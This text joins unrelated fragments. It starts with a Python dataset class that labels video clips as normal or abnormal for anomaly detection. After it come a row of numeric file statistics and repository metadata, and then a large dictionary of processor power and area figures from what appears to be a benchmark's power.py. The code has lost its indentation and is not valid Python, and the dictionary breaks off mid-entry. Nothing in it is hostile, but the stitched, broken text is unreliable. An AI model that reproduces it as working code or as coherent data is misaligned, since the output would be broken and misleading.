# normal label
labels[0, :data[vid]['anomaly_start']] = 1
# anomaly label
labels[1, data[vid]['anomaly_start']:data[vid]['anomaly_end']] = 1 # binary classification
# normal label
labels[0, data[vid]['anomaly_end']:] = 1
assert int(data[vid]['anomaly_class']) > 0
for t in range(0, num_frames, (self.seq_len - self.overlap)):
if num_frames - t < self.seq_len:
seq_start = num_frames - self.seq_len
seq_end = num_frames
else:
seq_start = t
seq_end = t + self.seq_len
# label = labels[:, seq_start: seq_end]
# NOTE: for original I3D, one clip has only one label
label = np.zeros(2, np.float32)
# NOTE: method 1, assign the label of the middle frame
# middle_idx = int(seq_end-seq_start/2)
# if middle_idx >= data[vid]['anomaly_start'] and middle_idx < data[vid]['anomaly_end']:
# label[int(data[vid]['anomaly_class'])] = 1 # abnormal
# sample_category_stats[int(data[vid]['anomaly_class'])] += 1
# else:
# label[0] = 1 # normal
# sample_category_stats[0] += 1
# NOTE: method 2, assign the accident label if over 1/3 of the frames are abnormal
if sum(labels[:, seq_start:seq_end].nonzero()[0] > 0) >= self.seq_len/3:
label[1] = 1 # abnormal
sample_category_stats['abnormal'] += 1
else:
label[0] = 1 # normal
sample_category_stats['normal'] += 1
dataset.append({"vid": vid,
"label": label,
"start": seq_start, # NOTE: 0-index
"end": seq_end,# NOTE: 0-index
# "image_dir":
})
# if mode == 'flow':
# num_frames = num_frames//2
# NOTE: for over fitting on 10 videos
if idx >=9:
break
print("Number of samples of all categories:")
print(sample_category_stats)
return dataset
def make_test_dataset(self, split_file, split, root, mode):
dataset = []
with open(split_file, 'r') as f:
data = json.load(f)
self.valid_videos = []
for idx, vid in enumerate(data.keys()):
if data[vid]['video_start'] is None or \
data[vid]['video_start'] is None or \
data[vid]['anomaly_start'] is None or \
data[vid]['anomaly_end'] is None:
# NOTE: Sep 5, Some videos may have null video_start, meaning there is a bug and we skip the video for now
continue
# if data[vid]['subset'] != split:
# continue
if not os.path.exists(os.path.join(root, vid)):
continue
if int(data[vid]['anomaly_class']) == 10:
# skip unknown
continue
print("Validating videos:", vid)
num_frames = data[vid]['num_frames']
self.valid_videos.append(vid)
# NOTE: for original I3D, one clip has only one label
label = np.zeros(2, np.float32)
label[1] = 1
dataset.append({"vid": vid,
"label": label,
"start": 0, # NOTE: 0-index
"end": num_frames# NOTE: 0-index
})
# if mode == 'flow':
# num_frames = num_frames//2
if idx >=9:
break
return dataset
def load_rgb_frames(self, image_dir, vid, start, end):
frames = []
for i in range(start, end):
# img = cv2.imread(os.path.join(image_dir, vid, 'images', str(i).zfill(6)+'.jpg'))[:, :, [2, 1, 0]]
img = Image.open(os.path.join(image_dir, vid, 'images', str(i).zfill(6)+'.jpg'))
frames.append(img)
return frames #torch.stack(frames, dim=1)
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is class_index of the target class.
"""
data = self.data[index]
vid = data["vid"]
label = data["label"]
start = data["start"]
end = data["end"]
if os.path.exists(os.path.join(self.save_dir, vid+'.npy')):
return 0, 0, vid
if self.mode == 'rgb':
imgs = self.load_rgb_frames(self.root, vid, start, end)
else:
imgs = self.load_flow_frames(self.root, vid, start, end)
imgs, label = self.transforms(imgs, label)
return imgs, label, vid, start, end
def __len__(self):
return len(self.data) | 39.135255 | 122 | 0.489348 | 2,106 | 17,650 | 3.962963 | 0.107312 | 0.046969 | 0.063743 | 0.028517 | 0.870836 | 0.866283 | 0.860053 | 0.844237 | 0.844237 | 0.832135 | 0 | 0.021615 | 0.394504 | 17,650 | 451 | 123 | 39.135255 | 0.759334 | 0.248272 | 0 | 0.82963 | 0 | 0 | 0.073045 | 0.003618 | 0 | 0 | 0 | 0 | 0.007407 | 1 | 0.048148 | false | 0 | 0.044444 | 0.007407 | 0.148148 | 0.037037 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d4282e431c03fd13ae8985db0714b048de67ff6f | 68,588 | py | Python | benchmarks/SimResults/_bigLittle_hrrs_splash_tugberk_locality/cmp_fmm/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | benchmarks/SimResults/_bigLittle_hrrs_splash_tugberk_locality/cmp_fmm/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | benchmarks/SimResults/_bigLittle_hrrs_splash_tugberk_locality/cmp_fmm/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.465677,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.568452,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 2.3614,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.980647,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 1.69813,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.973923,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 3.6527,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.607291,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 10.4338,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.44612,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0355492,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.437644,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.262908,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.883764,
'Execution Unit/Register Files/Runtime Dynamic': 0.298458,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 1.18511,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 2.32562,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 7.2506,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00333317,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00333317,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00288654,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00110833,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.0037767,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.0133296,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0325526,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.25274,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.637436,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.85842,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.96874,
'Instruction Fetch Unit/Runtime Dynamic': 1.79448,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0210748,
'L2/Runtime Dynamic': 0.00574162,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.03428,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.34972,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0904949,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0904949,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 4.46336,
'Load Store Unit/Runtime Dynamic': 1.88651,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.223145,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.44629,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0791949,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0795098,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.399995,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.104502,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.695406,
'Memory Management Unit/Runtime Dynamic': 0.184012,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 29.144,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 1.55641,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0688736,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.475743,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 2.10103,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 13.2224,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.140138,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.312759,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.710543,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.255201,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.411629,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.207776,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.874606,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.182939,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.45938,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.134237,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0107043,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.131751,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0791645,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.265988,
'Execution Unit/Register Files/Runtime Dynamic': 0.0898688,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.312605,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.617551,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.30016,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00125963,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00125963,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00116095,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000484327,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.0011372,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00481743,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00979723,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0761029,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 4.84079,
